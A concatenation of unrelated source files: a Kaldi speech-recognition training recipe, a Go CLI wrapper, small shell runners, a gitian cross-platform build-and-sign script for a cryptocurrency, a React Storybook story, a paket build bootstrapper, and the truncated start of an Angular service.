#!/usr/bin/env bash
# 1v is as 1t, but using backstitch training with scale=1.0,interval=4, and
# num of epochs increased to 7
# ./local/chain/compare_wer_general.sh --looped exp/chain_cleaned/tdnn_lstm1e_sp_bi exp/chain_cleaned/tdnn_lstm1t_sp_bi
# System tdnn_lstm1t_sp_bi tdnn_lstm1v_sp_bi
# WER on dev(orig) 9.0 8.6
# [looped:] 9.0 8.7
# WER on dev(rescored) 8.4 8.3
# [looped:] 8.4 8.2
# WER on test(orig) 8.9 8.2
# [looped:] 8.9 8.3
# WER on test(rescored) 8.4 7.8
# [looped:] 8.4 7.8
# exp/chain_cleaned/tdnn_lstm1t_sp_bi: num-iters=253 nj=2..12 num-params=37.1M dim=40+100->3626 combine=-0.055->-0.055 xent:train/valid[167,252,final]=(-0.774,-0.655,-0.643/-0.928,-0.883,-0.873) logprob:train/valid[167,252,final]=(-0.063,-0.048,-0.046/-0.087,-0.089,-0.087)
# exp/chain_cleaned/tdnn_lstm1v_sp_bi: num-iters=444 nj=2..12 num-params=33.9M dim=40+100->3608 combine=-0.05->-0.05 xent:train/valid[295,443,final]=(-0.771,-0.622,-0.623/-0.865,-0.769,-0.768) logprob:train/valid[295,443,final]=(-0.054,-0.037,-0.037/-0.074,-0.064,-0.064)
set -e -o pipefail
# First the options that are passed through to run_ivector_common.sh
# (some of which are also used in this script directly).
stage=0
nj=30
decode_nj=30
min_seg_len=1.55
label_delay=5
xent_regularize=0.1
train_set=train_cleaned
gmm=tri3_cleaned # the gmm for the target data
num_threads_ubm=32
nnet3_affix=_cleaned # cleanup affix for nnet3 and chain dirs, e.g. _cleaned
# training options
chunk_left_context=40
chunk_right_context=0
chunk_left_context_initial=0
chunk_right_context_final=0
frames_per_chunk=140,100,160
num_epochs=7
# backstitch training options: alpha is the backstitch scale and back_interval
# the interval; both are passed to --trainer.optimization.backstitch-* below.
alpha=1.0
back_interval=4
# decode options
frames_per_chunk_primary=$(echo $frames_per_chunk | cut -d, -f1)
extra_left_context=50
extra_right_context=0
extra_left_context_initial=0
extra_right_context_final=0
# The rest are configs specific to this script. Most of the parameters
# are just hardcoded at this level, in the commands below.
train_stage=-10
tree_affix= # affix for tree directory, e.g. "a" or "b", in case we change the configuration.
tdnn_lstm_affix=1v #affix for TDNN-LSTM directory, e.g. "a" or "b", in case we change the configuration.
common_egs_dir= # you can set this to use previously dumped egs.
remove_egs=true
test_online_decoding=false # if true, it will run the last decoding stage.
# End configuration section.
echo "$0 $@" # Print the command line for logging
. ./cmd.sh
. ./path.sh
. ./utils/parse_options.sh
if ! cuda-compiled; then
cat <<EOF && exit 1
This script is intended to be used with GPUs but you have not compiled Kaldi with CUDA
If you want to use GPUs (and have them), go to src/, and configure and make on a machine
where "nvcc" is installed.
EOF
fi
local/nnet3/run_ivector_common.sh --stage $stage \
--nj $nj \
--min-seg-len $min_seg_len \
--train-set $train_set \
--gmm $gmm \
--num-threads-ubm $num_threads_ubm \
--nnet3-affix "$nnet3_affix"
gmm_dir=exp/$gmm
ali_dir=exp/${gmm}_ali_${train_set}_sp_comb
tree_dir=exp/chain${nnet3_affix}/tree_bi${tree_affix}
lat_dir=exp/chain${nnet3_affix}/${gmm}_${train_set}_sp_comb_lats
dir=exp/chain${nnet3_affix}/tdnn_lstm${tdnn_lstm_affix}_sp_bi
train_data_dir=data/${train_set}_sp_hires_comb
lores_train_data_dir=data/${train_set}_sp_comb
train_ivector_dir=exp/nnet3${nnet3_affix}/ivectors_${train_set}_sp_hires_comb
# Sanity check: everything produced by the earlier stages must exist before we start.
for f in $gmm_dir/final.mdl $train_data_dir/feats.scp $train_ivector_dir/ivector_online.scp \
$lores_train_data_dir/feats.scp $ali_dir/ali.1.gz $gmm_dir/final.mdl; do
[ ! -f $f ] && echo "$0: expected file $f to exist" && exit 1
done
if [ $stage -le 14 ]; then
echo "$0: creating lang directory with one state per phone."
# Create a version of the lang/ directory that has one state per phone in the
# topo file. [note, it really has two states.. the first one is only repeated
# once, the second one has zero or more repeats.]
if [ -d data/lang_chain ]; then
if [ data/lang_chain/L.fst -nt data/lang/L.fst ]; then
echo "$0: data/lang_chain already exists, not overwriting it; continuing"
else
echo "$0: data/lang_chain already exists and seems to be older than data/lang..."
echo " ... not sure what to do. Exiting."
exit 1;
fi
else
cp -r data/lang data/lang_chain
silphonelist=$(cat data/lang_chain/phones/silence.csl) || exit 1;
nonsilphonelist=$(cat data/lang_chain/phones/nonsilence.csl) || exit 1;
# Use our special topology... note that later on may have to tune this
# topology.
steps/nnet3/chain/gen_topo.py $nonsilphonelist $silphonelist >data/lang_chain/topo
fi
fi
if [ $stage -le 15 ]; then
# Get the alignments as lattices (gives the chain training more freedom).
# use the same num-jobs as the alignments
steps/align_fmllr_lats.sh --nj 100 --cmd "$train_cmd" ${lores_train_data_dir} \
data/lang $gmm_dir $lat_dir
rm $lat_dir/fsts.*.gz # save space
fi
if [ $stage -le 16 ]; then
# Build a tree using our new topology.  We know we have alignments for the
# speed-perturbed data (local/nnet3/run_ivector_common.sh made them), so use
# those.
if [ -f $tree_dir/final.mdl ]; then
echo "$0: $tree_dir/final.mdl already exists, refusing to overwrite it."
exit 1;
fi
steps/nnet3/chain/build_tree.sh --frame-subsampling-factor 3 \
--context-opts "--context-width=2 --central-position=1" \
--leftmost-questions-truncate -1 \
--cmd "$train_cmd" 4000 ${lores_train_data_dir} data/lang_chain $ali_dir $tree_dir
fi
if [ $stage -le 17 ]; then
mkdir -p $dir
echo "$0: creating neural net configs using the xconfig parser";
num_targets=$(tree-info $tree_dir/tree |grep num-pdfs|awk '{print $2}')
learning_rate_factor=$(echo "print (0.5/$xent_regularize)" | python)
mkdir -p $dir/configs
cat <<EOF > $dir/configs/network.xconfig
input dim=100 name=ivector
input dim=40 name=input
# please note that it is important to have input layer with the name=input
# as the layer immediately preceding the fixed-affine-layer to enable
# the use of short notation for the descriptor
fixed-affine-layer name=lda input=Append(-2,-1,0,1,2,ReplaceIndex(ivector, t, 0)) affine-transform-file=$dir/configs/lda.mat
# the first splicing is moved before the lda layer, so no splicing here
relu-renorm-layer name=tdnn1 dim=1024
relu-renorm-layer name=tdnn2 dim=1024 input=Append(-1,0,1)
fast-lstmp-layer name=lstm1 cell-dim=1024 recurrent-projection-dim=256 non-recurrent-projection-dim=256 decay-time=20 delay=-3
relu-renorm-layer name=tdnn3 dim=1024 input=Append(-3,0,3)
relu-renorm-layer name=tdnn4 dim=1024 input=Append(-3,0,3)
fast-lstmp-layer name=lstm2 cell-dim=1024 recurrent-projection-dim=256 non-recurrent-projection-dim=256 decay-time=20 delay=-3
relu-renorm-layer name=tdnn5 dim=1024 input=Append(-3,0,3)
relu-renorm-layer name=tdnn6 dim=1024 input=Append(-3,0,3)
fast-lstmp-layer name=lstm3 cell-dim=1024 recurrent-projection-dim=256 non-recurrent-projection-dim=256 decay-time=20 delay=-3
## adding the layers for chain branch
output-layer name=output input=lstm3 output-delay=$label_delay include-log-softmax=false dim=$num_targets max-change=1.5
# adding the layers for xent branch
# This block prints the configs for a separate output that will be
# trained with a cross-entropy objective in the 'chain' models... this
# has the effect of regularizing the hidden parts of the model.  we use
# 0.5 / args.xent_regularize as the learning rate factor- the factor of
# 0.5 / args.xent_regularize is suitable as it means the xent
# final-layer learns at a rate independent of the regularization
# constant; and the 0.5 was tuned so as to make the relative progress
# similar in the xent and regular final layers.
output-layer name=output-xent input=lstm3 output-delay=$label_delay dim=$num_targets learning-rate-factor=$learning_rate_factor max-change=1.5
EOF
steps/nnet3/xconfig_to_configs.py --xconfig-file $dir/configs/network.xconfig --config-dir $dir/configs/
fi
# Stage 18: train the 'chain' TDNN-LSTM model (with backstitch — see the
# backstitch-training-scale/-interval options below).
if [ $stage -le 18 ]; then
if [[ $(hostname -f) == *.clsp.jhu.edu ]] && [ ! -d $dir/egs/storage ]; then
utils/create_split_dir.pl \
/export/b0{5,6,7,8}/$USER/kaldi-data/egs/tedlium-$(date +'%m_%d_%H_%M')/s5_r2/$dir/egs/storage $dir/egs/storage
fi
steps/nnet3/chain/train.py --stage $train_stage \
--cmd "$decode_cmd" \
--feat.online-ivector-dir $train_ivector_dir \
--feat.cmvn-opts "--norm-means=false --norm-vars=false" \
--chain.xent-regularize $xent_regularize \
--chain.leaky-hmm-coefficient 0.1 \
--chain.l2-regularize 0.00005 \
--chain.apply-deriv-weights false \
--chain.lm-opts="--num-extra-lm-states=2000" \
--egs.dir "$common_egs_dir" \
--egs.opts "--frames-overlap-per-eg 0" \
--egs.chunk-width "$frames_per_chunk" \
--egs.chunk-left-context "$chunk_left_context" \
--egs.chunk-right-context "$chunk_right_context" \
--egs.chunk-left-context-initial "$chunk_left_context_initial" \
--egs.chunk-right-context-final "$chunk_right_context_final" \
--trainer.num-chunk-per-minibatch 128,64 \
--trainer.frames-per-iter 1500000 \
--trainer.max-param-change 2.0 \
--trainer.num-epochs $num_epochs \
--trainer.deriv-truncate-margin 10 \
--trainer.optimization.shrink-value 0.99 \
--trainer.optimization.num-jobs-initial 2 \
--trainer.optimization.num-jobs-final 12 \
--trainer.optimization.initial-effective-lrate 0.001 \
--trainer.optimization.final-effective-lrate 0.0001 \
--trainer.optimization.momentum 0.0 \
--trainer.optimization.backstitch-training-scale $alpha \
--trainer.optimization.backstitch-training-interval $back_interval \
--cleanup.remove-egs "$remove_egs" \
--feat-dir $train_data_dir \
--tree-dir $tree_dir \
--lat-dir $lat_dir \
--dir $dir
fi
if [ $stage -le 19 ]; then
# Note: it might appear that this data/lang_chain directory is mismatched, and it is as
# far as the 'topo' is concerned, but this script doesn't read the 'topo' from
# the lang directory.
utils/mkgraph.sh --self-loop-scale 1.0 data/lang $dir $dir/graph
fi
if [ $stage -le 20 ]; then
rm $dir/.error 2>/dev/null || true
for dset in dev test; do
(
steps/nnet3/decode.sh --num-threads 4 --nj $decode_nj --cmd "$decode_cmd" \
--acwt 1.0 --post-decode-acwt 10.0 \
--extra-left-context $extra_left_context \
--extra-right-context $extra_right_context \
--extra-left-context-initial $extra_left_context_initial \
--extra-right-context-final $extra_right_context_final \
--frames-per-chunk "$frames_per_chunk_primary" \
--online-ivector-dir exp/nnet3${nnet3_affix}/ivectors_${dset}_hires \
--scoring-opts "--min-lmwt 5 " \
$dir/graph data/${dset}_hires $dir/decode_${dset} || exit 1;
steps/lmrescore_const_arpa.sh --cmd "$decode_cmd" data/lang data/lang_rescore \
data/${dset}_hires ${dir}/decode_${dset} ${dir}/decode_${dset}_rescore || exit 1
) || touch $dir/.error &
done
wait
if [ -f $dir/.error ]; then
echo "$0: something went wrong in decoding"
exit 1
fi
fi
if [ $stage -le 21 ]; then
# 'looped' decoding.  we didn't write a -parallel version of this program yet,
# so it will take a bit longer as the --num-threads option is not supported.
# we just hardcode the --frames-per-chunk option as it doesn't have to
# match any value used in training, and it won't affect the results very much (unlike
# regular decoding)... [it will affect them slightly due to differences in the
# iVector extraction; probably smaller will be worse as it sees less of the future,
# but in a real scenario, long chunks will introduce excessive latency].
rm $dir/.error 2>/dev/null || true
for dset in dev test; do
(
steps/nnet3/decode_looped.sh --nj $decode_nj --cmd "$decode_cmd" \
--acwt 1.0 --post-decode-acwt 10.0 \
--extra-left-context-initial $extra_left_context_initial \
--frames-per-chunk 30 \
--online-ivector-dir exp/nnet3${nnet3_affix}/ivectors_${dset}_hires \
--scoring-opts "--min-lmwt 5 " \
$dir/graph data/${dset}_hires $dir/decode_looped_${dset} || exit 1;
steps/lmrescore_const_arpa.sh --cmd "$decode_cmd" data/lang data/lang_rescore \
data/${dset}_hires ${dir}/decode_looped_${dset} ${dir}/decode_looped_${dset}_rescore || exit 1
) || touch $dir/.error &
done
wait
if [ -f $dir/.error ]; then
echo "$0: something went wrong in decoding"
exit 1
fi
fi
if $test_online_decoding && [ $stage -le 22 ]; then
# note: if the features change (e.g. you add pitch features), you will have to
# change the options of the following command line.
steps/online/nnet3/prepare_online_decoding.sh \
--mfcc-config conf/mfcc_hires.conf \
data/lang_chain exp/nnet3${nnet3_affix}/extractor ${dir} ${dir}_online
rm $dir/.error 2>/dev/null || true
for dset in dev test; do
(
# note: we just give it "$dset" as it only uses the wav.scp, the
# feature type does not matter.
steps/online/nnet3/decode.sh --nj $decode_nj --cmd "$decode_cmd" \
--extra-left-context-initial $extra_left_context_initial \
--acwt 1.0 --post-decode-acwt 10.0 \
--scoring-opts "--min-lmwt 5 " \
$dir/graph data/${dset} ${dir}_online/decode_${dset} || exit 1;
steps/lmrescore_const_arpa.sh --cmd "$decode_cmd" data/lang data/lang_rescore \
data/${dset}_hires ${dir}_online/decode_${dset} ${dir}_online/decode_${dset}_rescore || exit 1
) || touch $dir/.error &
done
wait
if [ -f $dir/.error ]; then
echo "$0: something went wrong in decoding"
exit 1
fi
fi
exit 0
|
package main
import (
"flag"
"log"
"strings"
"github.com/andrewlader/go-tendo/tendo"
)
// path is the root directory tendo will walk (set from the -path flag).
var path string
// languageType selects the language parser (set from the -language flag).
var languageType tendo.LanguageType
// logLevel controls logging verbosity (set from the -log flag).
var logLevel tendo.LogLevel

// init parses command-line flags before main runs.
func init() {
parseArguments()
}
// main builds a tendo inspector from the parsed flags, walks the configured
// path, and prints the totals.
func main() {
	// Use a name that does not shadow the imported "tendo" package.
	app := tendo.NewTendo(logLevel)
	app.Inspect(path, languageType)
	app.DisplayTotals()
}
// parseArguments defines and parses the command-line flags, populating the
// package-level path, languageType and logLevel variables.
//
// Unknown -log or -language values previously mapped silently to the zero
// value of the respective type; they now fall back to the documented defaults
// ("all" and "go") with a warning, and both lookups are case-insensitive.
func parseArguments() {
	var logLevelFlag string
	var languageTypeFlag string
	logLevelMapping := map[string]tendo.LogLevel{
		"all":      tendo.LogAll,
		"trace":    tendo.LogTrace,
		"info":     tendo.LogInfo,
		"warnings": tendo.LogWarnings,
		"errors":   tendo.LogErrors,
	}
	languageTypeMapping := map[string]tendo.LanguageType{
		"go":   tendo.LanguageType(tendo.Golang),
		"java": tendo.LanguageType(tendo.Java),
	}
	flag.StringVar(&path, "path", "./", "defines the path to walk")
	flag.StringVar(&logLevelFlag, "log", "all", "defines the level for logging output")
	flag.StringVar(&languageTypeFlag, "language", "go", "defines the programming language for the path")
	flag.Parse()
	var ok bool
	if languageType, ok = languageTypeMapping[strings.ToLower(languageTypeFlag)]; !ok {
		log.Printf("unknown language %q, defaulting to go", languageTypeFlag)
		languageType = languageTypeMapping["go"]
	}
	if logLevel, ok = logLevelMapping[strings.ToLower(logLevelFlag)]; !ok {
		log.Printf("unknown log level %q, defaulting to all", logLevelFlag)
		logLevel = logLevelMapping["all"]
	}
	log.Printf("path: %s, language type: %s, log level: %s", path, languageTypeFlag, logLevelFlag)
}
|
# Resolve this script's directory and point the service at its deploy config.
script_dir=$(dirname "$(readlink -f "$0")")
export KB_DEPLOYMENT_CONFIG="$script_dir/../deploy.cfg"
WD=/kb/module/work
if [ -f "$WD/token" ]; then
    # Feed the token file to xargs so it is appended as the final argument(s);
    # redirection replaces the useless "cat | xargs". All expansions are quoted
    # to survive paths containing spaces.
    xargs sh "$script_dir/../bin/run_DataFileUtil_async_job.sh" "$WD/input.json" "$WD/output.json" < "$WD/token"
else
    echo "File $WD/token doesn't exist, aborting."
    exit 1
fi
|
#!/usr/bin/env bash
# Build the program, run every available input file through it, diff against
# the expected output, and report each failing case; then clean up.
make --silent --no-print-directory -C .. all
for (( i=0; i<=100; i++ ))
do
    # Input files may be sparse; skip missing indices.
    if ! [ -f "inputs/input$i" ]; then
        continue
    fi
    ../hw2.exe <"inputs/input$i" >'test.out'
    # Test diff's exit status directly instead of inspecting $? afterwards.
    if ! diff 'test.out' "outputs/output$i" >/dev/null; then
        echo "input$i failed"
    fi
done
make --silent --no-print-directory -C .. clean
|
#!/bin/bash
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# What to do
sign=false
verify=false
build=false
# Systems to build
linux=true
windows=true
osx=true
# Other Basic variables
SIGNER=
VERSION=
commit=false
url=https://github.com/netrumproject/netrum
proc=2
mem=2000
lxc=true
osslTarUrl=http://downloads.sourceforge.net/project/osslsigncode/osslsigncode/osslsigncode-1.7.1.tar.gz
osslPatchUrl=https://bitcoincore.org/cfields/osslsigncode-Backports-to-1.7.1.patch
scriptName=$(basename -- "$0")
# Default signing command; replaced by the no-op "true" when --detach-sign is given.
signProg="gpg --detach-sign"
commitFiles=true
# Help Message
# NOTE: read -d '' returns non-zero at EOF; harmless here since errexit is not enabled.
read -r -d '' usage <<- EOF
Usage: $scriptName [-c|u|v|b|s|B|o|h|j|m|] signer version
Run this script from the directory containing the netrum, gitian-builder, gitian.sigs, and netrum-detached-sigs.
Arguments:
signer          GPG signer to sign each build assert file
version		Version number, commit, or branch to build. If building a commit or branch, the -c option must be specified
Options:
-c|--commit	Indicate that the version argument is for a commit or branch
-u|--url	Specify the URL of the repository. Default is https://github.com/netrumproject/netrum
-v|--verify 	Verify the gitian build
-b|--build	Do a gitian build
-s|--sign	Make signed binaries for Windows and Mac OSX
-B|--buildsign	Build both signed and unsigned binaries
-o|--os		Specify which Operating Systems the build is for. Default is lwx. l for linux, w for windows, x for osx, a for aarch64
-j		Number of processes to use. Default 2
-m		Memory to allocate in MiB. Default 2000
--kvm		Use KVM instead of LXC
--setup		Setup the gitian building environment. Uses KVM. If you want to use lxc, use the --lxc option. Only works on Debian-based systems (Ubuntu, Debian)
--detach-sign   Create the assert file for detached signing. Will not commit anything.
--no-commit     Do not commit anything to git
-h|--help	Print this help message
EOF
# Get options and arguments
while :; do
case $1 in
# Verify
-v|--verify)
verify=true
;;
# Build
-b|--build)
build=true
;;
# Sign binaries
-s|--sign)
sign=true
;;
# Build then Sign
-B|--buildsign)
sign=true
build=true
;;
# PGP Signer
-S|--signer)
if [ -n "$2" ]
then
SIGNER=$2
shift
else
echo 'Error: "--signer" requires a non-empty argument.'
exit 1
fi
;;
# Operating Systems
-o|--os)
if [ -n "$2" ]
then
linux=false
windows=false
osx=false
aarch64=false
if [[ "$2" = *"l"* ]]
then
linux=true
fi
if [[ "$2" = *"w"* ]]
then
windows=true
fi
if [[ "$2" = *"x"* ]]
then
osx=true
fi
if [[ "$2" = *"a"* ]]
then
aarch64=true
fi
shift
else
printf 'Error: "--os" requires an argument containing an l (for linux), w (for windows), x (for Mac OSX), or a (for aarch64)\n'
exit 1
fi
;;
# Help message
-h|--help)
echo "$usage"
exit 0
;;
# Commit or branch
-c|--commit)
commit=true
;;
# Number of Processes
-j)
if [ -n "$2" ]
then
proc=$2
shift
else
echo 'Error: "-j" requires an argument'
exit 1
fi
;;
# Memory to allocate
-m)
if [ -n "$2" ]
then
mem=$2
shift
else
echo 'Error: "-m" requires an argument'
exit 1
fi
;;
# URL
-u)
if [ -n "$2" ]
then
url=$2
shift
else
echo 'Error: "-u" requires an argument'
exit 1
fi
;;
# kvm
--kvm)
lxc=false
;;
# Detach sign
--detach-sign)
signProg="true"
commitFiles=false
;;
# Commit files
--no-commit)
commitFiles=false
;;
# Setup
--setup)
setup=true
;;
*) # Default case: If no more options then break out of the loop.
break
esac
shift
done
# Set up LXC
if [[ $lxc = true ]]
then
export USE_LXC=1
export LXC_BRIDGE=lxcbr0
# NOTE(review): 10.0.2.2 matches the host address gitian's LXC guests expect — confirm for this setup.
sudo ifconfig lxcbr0 up 10.0.2.2
fi
# Check for OSX SDK
if [[ ! -e "gitian-builder/inputs/MacOSX10.11.sdk.tar.gz" && $osx == true ]]
then
echo "Cannot build for OSX, SDK does not exist. Will build for other OSes"
osx=false
fi
# Get signer
if [[ -n "$1" ]]
then
SIGNER=$1
shift
fi
# Get version
if [[ -n "$1" ]]
then
VERSION=$1
COMMIT=$VERSION
shift
fi
# Check that a signer is specified
if [[ $SIGNER == "" ]]
then
echo "$scriptName: Missing signer."
echo "Try $scriptName --help for more information"
exit 1
fi
# Check that a version is specified
if [[ $VERSION == "" ]]
then
echo "$scriptName: Missing version."
echo "Try $scriptName --help for more information"
exit 1
fi
# Add a "v" if no -c
if [[ $commit = false ]]
then
COMMIT="v${VERSION}"
fi
echo "${COMMIT}"
# Setup build environment
if [[ $setup = true ]]
then
sudo apt-get install ruby apache2 git apt-cacher-ng python-vm-builder qemu-kvm qemu-utils
git clone https://github.com/netrumproject/gitian.sigs.git
git clone https://github.com/netrumproject/netrum-detached-sigs.git
git clone https://github.com/devrandom/gitian-builder.git
pushd ./gitian-builder || exit
if [[ -n "$USE_LXC" ]]
then
sudo apt-get install lxc
bin/make-base-vm --suite trusty --arch amd64 --lxc
else
bin/make-base-vm --suite trusty --arch amd64
fi
popd || exit
fi
# Set up build
pushd ./netrum || exit
git fetch
git checkout "${COMMIT}"
popd || exit
# Build
if [[ $build = true ]]
then
# Make output folder
mkdir -p "./netrum-binaries/${VERSION}"
# Build Dependencies
echo ""
echo "Building Dependencies"
echo ""
pushd ./gitian-builder || exit
mkdir -p inputs
wget -N -P inputs $osslPatchUrl
wget -N -P inputs $osslTarUrl
make -C ../netrum/depends download SOURCES_PATH="$(pwd)/cache/common"
# Linux
if [[ $linux = true ]]
then
echo ""
echo "Compiling ${VERSION} Linux"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-linux.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-linux --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-linux.yml
mv build/out/netrum-*.tar.gz build/out/src/netrum-*.tar.gz ../netrum-binaries/${VERSION}
fi
# Windows
if [[ $windows = true ]]
then
echo ""
echo "Compiling ${VERSION} Windows"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-win.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-win-unsigned --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-win.yml
# Stash the unsigned tarball where the signing descriptors expect it (inputs/).
mv build/out/netrum-*-win-unsigned.tar.gz inputs/netrum-win-unsigned.tar.gz
mv build/out/netrum-*.zip build/out/netrum-*.exe ../netrum-binaries/${VERSION}
fi
# Mac OSX
if [[ $osx = true ]]
then
echo ""
echo "Compiling ${VERSION} Mac OSX"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-osx.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-osx-unsigned --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-osx.yml
# Stash the unsigned tarball where the signing descriptors expect it (inputs/).
mv build/out/netrum-*-osx-unsigned.tar.gz inputs/netrum-osx-unsigned.tar.gz
mv build/out/netrum-*.tar.gz build/out/netrum-*.dmg ../netrum-binaries/${VERSION}
fi
# AArch64
if [[ $aarch64 = true ]]
then
echo ""
echo "Compiling ${VERSION} AArch64"
echo ""
./bin/gbuild -j ${proc} -m ${mem} --commit netrum=${COMMIT} --url netrum=${url} ../netrum/contrib/gitian-descriptors/gitian-aarch64.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-aarch64 --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-aarch64.yml
mv build/out/netrum-*.tar.gz build/out/src/netrum-*.tar.gz ../netrum-binaries/${VERSION}
fi
popd || exit
if [[ $commitFiles = true ]]
then
# Commit to gitian.sigs repo
echo ""
echo "Committing ${VERSION} Unsigned Sigs"
echo ""
pushd gitian.sigs || exit
git add ${VERSION}-linux/${SIGNER}
git add ${VERSION}-aarch64/${SIGNER}
git add ${VERSION}-win-unsigned/${SIGNER}
git add ${VERSION}-osx-unsigned/${SIGNER}
git commit -a -m "Add ${VERSION} unsigned sigs for ${SIGNER}"
popd || exit
fi
fi
# Verify the build: check each gitian build result against the committed
# signatures in ../gitian.sigs.
if [[ $verify = true ]]
then
# Linux
pushd ./gitian-builder || exit
echo ""
echo "Verifying v${VERSION} Linux"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-linux ../netrum/contrib/gitian-descriptors/gitian-linux.yml
# Windows
echo ""
echo "Verifying v${VERSION} Windows"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-win-unsigned ../netrum/contrib/gitian-descriptors/gitian-win.yml
# Mac OSX
echo ""
echo "Verifying v${VERSION} Mac OSX"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-osx-unsigned ../netrum/contrib/gitian-descriptors/gitian-osx.yml
# AArch64
echo ""
echo "Verifying v${VERSION} AArch64"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-aarch64 ../netrum/contrib/gitian-descriptors/gitian-aarch64.yml
# Signed Windows
echo ""
echo "Verifying v${VERSION} Signed Windows"
echo ""
# BUGFIX: this step previously re-verified the osx-signed release with the
# osx signer descriptor; it must verify the Windows detached-sig build.
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-win-signed ../netrum/contrib/gitian-descriptors/gitian-win-signer.yml
# Signed Mac OSX
echo ""
echo "Verifying v${VERSION} Signed Mac OSX"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-osx-signed ../netrum/contrib/gitian-descriptors/gitian-osx-signer.yml
popd || exit
fi
# Sign binaries: combines the unsigned tarballs stashed in inputs/ during the
# build phase with the detached signatures checked out at ${COMMIT}.
if [[ $sign = true ]]
then
pushd ./gitian-builder || exit
# Sign Windows
if [[ $windows = true ]]
then
echo ""
echo "Signing ${VERSION} Windows"
echo ""
./bin/gbuild -i --commit signature=${COMMIT} ../netrum/contrib/gitian-descriptors/gitian-win-signer.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-win-signed --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-win-signer.yml
mv build/out/netrum-*win64-setup.exe ../netrum-binaries/${VERSION}
mv build/out/netrum-*win32-setup.exe ../netrum-binaries/${VERSION}
fi
# Sign Mac OSX
if [[ $osx = true ]]
then
echo ""
echo "Signing ${VERSION} Mac OSX"
echo ""
./bin/gbuild -i --commit signature=${COMMIT} ../netrum/contrib/gitian-descriptors/gitian-osx-signer.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-osx-signed --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-osx-signer.yml
mv build/out/netrum-osx-signed.dmg ../netrum-binaries/${VERSION}/netrum-${VERSION}-osx.dmg
fi
popd || exit
if [[ $commitFiles = true ]]
then
# Commit Sigs
pushd gitian.sigs || exit
echo ""
echo "Committing ${VERSION} Signed Sigs"
echo ""
git add ${VERSION}-win-signed/${SIGNER}
git add ${VERSION}-osx-signed/${SIGNER}
git commit -a -m "Add ${VERSION} signed binary sigs for ${SIGNER}"
popd || exit
fi
fi
|
import React, { useRef, useEffect } from 'react'
import { withKnobs, optionsKnob, boolean } from '@storybook/addon-knobs'
import { Setup } from '../Setup'
import { TransformControls } from '../../src/TransformControls'
import { Box } from '../../src/shapes'
import { OrbitControls } from '../../src/OrbitControls'
// Basic story: a wireframe box wrapped in TransformControls inside the shared
// Setup scene.
export function TransformControlsStory() {
  return (
    <Setup>
      <TransformControls>
        <Box>
          <meshBasicMaterial attach="material" wireframe />
        </Box>
      </TransformControls>
    </Setup>
  )
}
TransformControlsStory.storyName = 'Default'
// Storybook metadata for this group of stories.
export default {
  title: 'Controls/TransformControls',
  component: TransformControls,
}
function TransformControlsLockScene({ mode, showX, showY, showZ }) {
const orbitControls = useRef()
const transformControls = useRef()
useEffect(() => {
if (transformControls.current) {
const controls = transformControls.current
const callback = (event) => (orbitControls.current.enabled = !event.value)
controls.addEventListener('dragging-changed', callback)
return () => controls.removeEventListener('dragging-changed', callback)
}
})
return (
<>
<TransformControls ref={transformControls} mode={mode} showX={showX} showY={showY} showZ={showZ}>
<Box>
<meshBasicMaterial attach="material" wireframe />
</Box>
</TransformControls>
<OrbitControls ref={orbitControls} />
</>
)
}
export const TransformControlsLockSt = () => {
const modesObj = {
scale: 'scale',
rotate: 'rotate',
translate: 'translate',
}
return (
<TransformControlsLockScene
mode={optionsKnob('mode', modesObj, 'translate', {
display: 'radio',
})}
showX={boolean('showX', true)}
showY={boolean('showY', true)}
showZ={boolean('showZ', true)}
/>
)
}
TransformControlsLockSt.storyName = 'Lock orbit controls while transforming'
TransformControlsLockSt.decorators = [withKnobs, (storyFn) => <Setup controls={false}>{storyFn()}</Setup>]
|
#!/bin/bash
# Bootstrap paket, restore dependencies, and run the FAKE build script.
# On Windows the .NET executables run directly; elsewhere they run under mono.
if test "$OS" = "Windows_NT"
then
  # use .Net
  .paket/paket.bootstrapper.exe
  exit_code=$?
  if [ $exit_code -ne 0 ]; then
    exit $exit_code
  fi

  .paket/paket.exe restore
  exit_code=$?
  if [ $exit_code -ne 0 ]; then
    exit $exit_code
  fi

  [ ! -e build.fsx ] && .paket/paket.exe update
  # "$@" (quoted) forwards each argument intact; unquoted $@ split args on spaces
  packages/FAKE/tools/FAKE.exe "$@" --fsiargs -d:MONO build.fsx
else
  # use mono
  mono .paket/paket.bootstrapper.exe
  exit_code=$?
  if [ $exit_code -ne 0 ]; then
    exit $exit_code
  fi

  mono .paket/paket.exe restore
  exit_code=$?
  if [ $exit_code -ne 0 ]; then
    exit $exit_code
  fi

  [ ! -e build.fsx ] && mono .paket/paket.exe update
  mono packages/FAKE/tools/FAKE.exe "$@" --fsiargs -d:MONO build.fsx
fi
|
<reponame>idrice24/mns
import { Injectable } from '@angular/core';
import { AppVideo, AppVideoItem } from '../models/app-video';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { Observable, of } from 'rxjs';
